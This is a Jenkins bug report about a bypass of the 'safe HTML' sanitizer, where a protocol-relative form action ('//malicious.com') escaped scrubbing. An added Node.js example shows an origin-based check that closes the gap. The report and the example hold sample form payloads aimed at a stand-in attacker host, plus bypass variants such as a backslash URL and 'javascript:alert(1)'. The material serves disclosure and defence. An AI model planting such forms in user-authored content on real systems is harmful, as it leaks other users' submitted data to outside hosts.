
"Safe HTML" vulnerable to protocol-relative form action

    Details

    • Type: Bug
    • Status: Resolved
    • Priority: Minor
    • Resolution: Fixed

      Description

      With "safe html" enabled for user text entry, a form with an external action URI is scrubbed. However, it is possible to write a form having a protocol-relative action URI that could be used to leak sensitive data to an external service.

      For example, this HTML is scrubbed correctly with the form action removed:

      <form action="https://malicious.com">
      <input type="submit">
      </form>

      The form action in this example is not scrubbed and it is possible for a user to create a form that directs to an external site:

      <form action="//malicious.com">
      <input type="submit">
      </form>
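The two forms above differ only in whether the action carries a scheme, which is why a sanitizer rule that looks for "scheme:" at the start of the attribute misses the second one. The following is an added example, not code from the Jenkins project, the antisamy-markup-formatter plugin or the reporter, and it does not reproduce how PR 4 fixed the plugin (that change is not shown on this page). It contrasts a scheme-based check with a check that resolves the action against the instance URL the way a browser would and compares origins. It assumes Node.js and its WHATWG `URL` class; `BASE_URL`, the sample HTML fragments and the function names are constructed for the demonstration.

```javascript
// Added example, not code from the Jenkins project or the issue reporter.
// Assumes Node.js (WHATWG URL class). BASE_URL is a constructed placeholder for
// the Jenkins instance; SAMPLES are constructed test inputs.
const BASE_URL = "https://jenkins.example.com/job/demo/";

// Scheme-based rule: treat an action as external only if it starts with a
// scheme such as "https:". This is the kind of check the report describes
// being bypassed, because "//malicious.com" carries no scheme.
function naiveIsExternal(action) {
  return /^[a-z][a-z0-9+.-]*:/i.test(action);
}

// Origin-based rule: resolve the action exactly as the browser will and compare
// the resulting origin with the Jenkins origin. Protocol-relative ("//host"),
// backslash ("\\host", which WHATWG parsing treats like "//host") and non-http
// schemes such as "javascript:" all end up rejected. Unparseable input is
// rejected rather than guessed at.
function resolvedIsExternal(action, base = BASE_URL) {
  let resolved;
  try {
    resolved = new URL(action, base);
  } catch {
    return true;
  }
  if (resolved.protocol !== "http:" && resolved.protocol !== "https:") {
    return true;
  }
  return resolved.origin !== new URL(base).origin;
}

// Pull action attributes out of a fragment of user-supplied HTML. A regex is
// enough for this demonstration; a real sanitizer works on a parsed DOM.
function formActions(html) {
  const actions = [];
  const re = /<form\b[^>]*?\baction\s*=\s*(?:"([^"]*)"|'([^']*)'|([^\s>]+))/gi;
  let m;
  while ((m = re.exec(html)) !== null) {
    actions.push(m[1] ?? m[2] ?? m[3]);
  }
  return actions;
}

// Constructed samples: the two forms from the report plus a few variants.
const SAMPLES = [
  '<form action="https://malicious.com"><input type="submit"></form>',
  '<form action="//malicious.com"><input type="submit"></form>',
  '<form action="\\\\malicious.com"><input type="submit"></form>',
  '<form action="javascript:alert(1)"><input type="submit"></form>',
  '<form action="/job/demo/build"><input type="submit"></form>',
  '<form action="build?delay=0sec"><input type="submit"></form>',
];

// Actions that the scheme-based rule lets through but that actually submit
// to a different origin: the reporter's bypass and its backslash cousin.
function missedByNaive(htmlSamples = SAMPLES) {
  return htmlSamples
    .flatMap(formActions)
    .filter((a) => !naiveIsExternal(a) && resolvedIsExternal(a));
}

console.log(missedByNaive());
```

The point of `resolvedIsExternal` is that the decision is made on the URL the browser will actually submit to, not on the attribute's spelling, so any further spelling variant the parser accepts is covered without a new rule. Allowing only same-origin http(s) targets is stricter than stripping known-bad prefixes, which is the right default for content that other users can author.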

            Activity

            jec Josh Cook created issue -
            danielbeck Daniel Beck made changes -
            Field Original Value New Value
            Component/s antisamy-markup-formatter-plugin [ 18424 ]
            Component/s security [ 15508 ]
            Priority Critical [ 2 ] Minor [ 4 ]
            danielbeck Daniel Beck made changes -
            Assignee Daniel Beck [ danielbeck ]
            danielbeck Daniel Beck made changes -
            Status Open [ 1 ] In Progress [ 3 ]
            danielbeck Daniel Beck made changes -
            Remote Link This issue links to "PR 4 (Web Link)" [ 13700 ]
            scm_issue_link SCM/JIRA link daemon made changes -
            Status In Progress [ 3 ] Resolved [ 5 ]
            Resolution Fixed [ 1 ]
            rtyler R. Tyler Croy made changes -
            Workflow JNJira [ 167048 ] JNJira + In-Review [ 198104 ]
            cloudbees CloudBees Inc. made changes -
            Remote Link This issue links to "CloudBees Internal OSS-769 (Web Link)" [ 18833 ]

              People

              • Assignee: danielbeck Daniel Beck
              • Reporter: jec Josh Cook
              • Votes: 0
              • Watchers: 3
